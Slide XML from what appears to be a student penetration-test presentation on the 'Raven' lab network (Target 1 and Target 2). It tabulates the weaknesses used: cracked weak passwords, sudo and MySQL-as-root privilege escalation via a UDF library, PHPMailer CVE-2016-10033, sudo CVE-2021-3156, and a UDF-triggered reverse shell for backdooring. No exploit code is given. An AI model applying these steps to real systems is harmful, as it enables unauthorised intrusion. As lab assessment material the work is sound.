            <a:srgbClr val="1F1C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Backdooring the Target</a:t>
            </a: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999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(3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6" name="Google Shape;162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17325"/>
            <a:ext cx="15180574" cy="75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7425" y="2916325"/>
            <a:ext cx="9442876" cy="70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20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="15835200" cy="2785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Sending SQL, calling the user defined function,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that runs a system command for a reverse shell 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2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635" name="Google Shape;1635;p12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Thank You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For Listening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6" name="Google Shape;1636;p12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100" y="3762070"/>
            <a:ext cx="17860803" cy="9349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86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741100" y="1709950"/>
            <a:ext cx="7005900" cy="205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86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18601900" y="1709950"/>
            <a:ext cx="5384400" cy="1102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8" name="Google Shape;1348;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18068500" y="1786150"/>
            <a:ext cx="6351000" cy="114837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IPv4: 192.168.1.1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OS: Windows 10 Pro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Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900"/>
              <a:t>ML-RefVm-684427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IPv4: 192.168.1.90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OS: Kali Linux 2020.1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Hostname: Kali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IPv4: 192.168.1.100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OS: Ubuntu 18.04.4 LTS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Hostname: ELK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IPv4: 192.168.1.105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OS: Ubuntu 18.04.1 LTS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Hostname: Server1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IPv4: 192.168.1.110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OS: Debian Linux 8.11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Hostname: Target1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IPv4: 192.168.1.115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OS: Debian Linux 8.11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</a:rPr>
              <a:t>Hostname: Target2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6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0" name="Google Shape;1350;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483875" y="1786150"/>
            <a:ext cx="7005900" cy="26943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Address Range: 192.168.1.1-255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Netmask: 255.255.255.0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/>
              <a:t>Gateway: 192.168.1.1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8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56" name="Google Shape;1356;p8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7" name="Google Shape;1357;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="23471100" cy="1423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</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="4400"/>
              <a:t>exclusive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> to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58" name="Google Shape;1358;p87"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="703375" y="355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{75691887-5AB8-466B-A025-E6DA13E93E20}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7846925"/>
                <a:gridCol w="7448300"/>
                <a:gridCol w="7647600"/>
              </a:tblGrid>
              <a:tr h="8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43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CWE-521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Requirements</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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One password easily guessed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Two passwords cracked with hashcat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in via SSH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 Michael or Steven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in to Wordpress admin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 Steven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43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CWE-250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Execution with Unnecessary Privileges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CWE-269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Privilege Management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Steven has permission to run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with sudo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privilege escalation to root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Critical Vulnerabilities: Target 1 and Target 2    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1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5" name="Google Shape;1365;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="24443100" cy="1423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vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 2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6" name="Google Shape;1366;p88"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="703375" y="355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{75691887-5AB8-466B-A025-E6DA13E93E20}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7846925"/>
                <a:gridCol w="7448300"/>
                <a:gridCol w="7647600"/>
              </a:tblGrid>
              <a:tr h="86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36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 of Sensitive Information to an Unauthorized Actor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Target 1,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 1 is publicly exposed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HTML page source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On Target 2,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 1 is publicly exposed </a:t>
                      </a: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raven.local/vendor/PATH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Target 1 and Target 2</a:t>
                      </a:r>
                      <a:b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 enumerates all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usernames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access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information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(Flag 1 and Wordpress usernames)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238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CWE-548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Exposure of Information Through Directory Listing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is enabled at</a:t>
                      </a:r>
                      <a:b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raven.local/vendor/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anyone to browse the files and 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directories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at this location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Vulnerabilities: Target 1 and Target 2    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2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3" name="Google Shape;1373;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="24443100" cy="1423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vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 2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4" name="Google Shape;1374;p89"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="703375" y="355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{75691887-5AB8-466B-A025-E6DA13E93E20}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7846925"/>
                <a:gridCol w="7448300"/>
                <a:gridCol w="7647600"/>
              </a:tblGrid>
              <a:tr h="8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43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CWE-269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Privilege Management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is accessing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MySQL database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the MySQL root user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anyone with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read access to wp-config.php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directly run arbitrary commands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 any database on the server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43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CVE-2016-10033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PHPMailer before 5.2.18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mailSend function PHPMailer (before 5.2.18) might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code execution,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via a \" in a crafted Sender property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an attacker to run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commands and execute code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 the www-data user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Vulnerabilities: Target 1 and Target 2    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(3 of 3)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" name="Google Shape;1381;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="24443100" cy="1423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Our assessment uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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2" name="Google Shape;1382;p90"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="703375" y="355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{75691887-5AB8-466B-A025-E6DA13E93E20}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7846925"/>
                <a:gridCol w="7448300"/>
                <a:gridCol w="7647600"/>
              </a:tblGrid>
              <a:tr h="86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585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CWE-250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Execution with Unnecessary Privileges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EDB-ID-1518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User-Defined Function (UDF) Dynamic Library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MySQL service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 running as root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MySQL is running as root,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dynamic library can be installed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a user defined SQL function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function can be called </a:t>
                      </a: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via </a:t>
                      </a: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SQL,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allowing system commands to be executed as root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privilege escalation to root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  <a:tr h="269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CVE-2021-3156 </a:t>
                      </a:r>
                      <a:endParaRPr b="1"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Baron Samedit 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Heap Buffer Overflow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Heap Buffer Overflow in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version of Sudo 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(1.8.10p3)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installed on the server </a:t>
                      </a:r>
                      <a:endParaRPr sz="3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-US" sz="3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llows privilege escalation to root</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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9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89" name="Google Shape;1389;p9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0" name="Google Shape;1390;p9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